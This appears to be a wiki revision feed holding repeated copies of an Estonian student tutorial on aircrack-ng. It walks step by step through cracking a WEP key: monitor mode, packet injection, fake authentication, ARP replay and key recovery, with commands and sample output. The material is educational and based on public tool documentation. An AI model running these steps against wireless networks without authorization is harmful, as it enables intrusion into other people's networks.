&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt&amp;lt;ref&amp;gt;[http://askubuntu.com/questions/294651/step-by-step-guide-to-install-aircrack-ng-suite-on-ubuntu-12-04-lts Step by Step guide to install aircrack-ng suite on ubuntu 12.04 LTS [duplicate]]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]&amp;lt;/ref&amp;gt;: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]&amp;lt;/ref&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]&amp;lt;/ref&amp;gt;:&amp;lt;br&amp;gt;&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liides:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Märge:&#039;&#039;&#039; Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;airmon-ng stop athX&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav &#039;&#039;airmon-ng stop ath0&#039;&#039; käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kontrolli:&#039;&#039;&#039; Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-9 - “süstimise” test&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-e teddy – raadiovõrgu nimi&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-c 9 – raadiovõrgu kanal&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-1 – võlts autentimine&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;0 – kordusühendus(t)e aeg sekundites&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
&#039;&#039;-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&amp;lt;br&amp;gt;&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89328</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89328"/>
		<updated>2015-05-25T19:52:37Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* Installeerimine */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit. &lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt&amp;lt;ref&amp;gt;[http://askubuntu.com/questions/294651/step-by-step-guide-to-install-aircrack-ng-suite-on-ubuntu-12-04-lts Step by Step guide to install aircrack-ng suite on ubuntu 12.04 LTS [duplicate]]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]&amp;lt;/ref&amp;gt;: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]&amp;lt;/ref&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]&amp;lt;/ref&amp;gt;:&amp;lt;br&amp;gt;&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liides:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
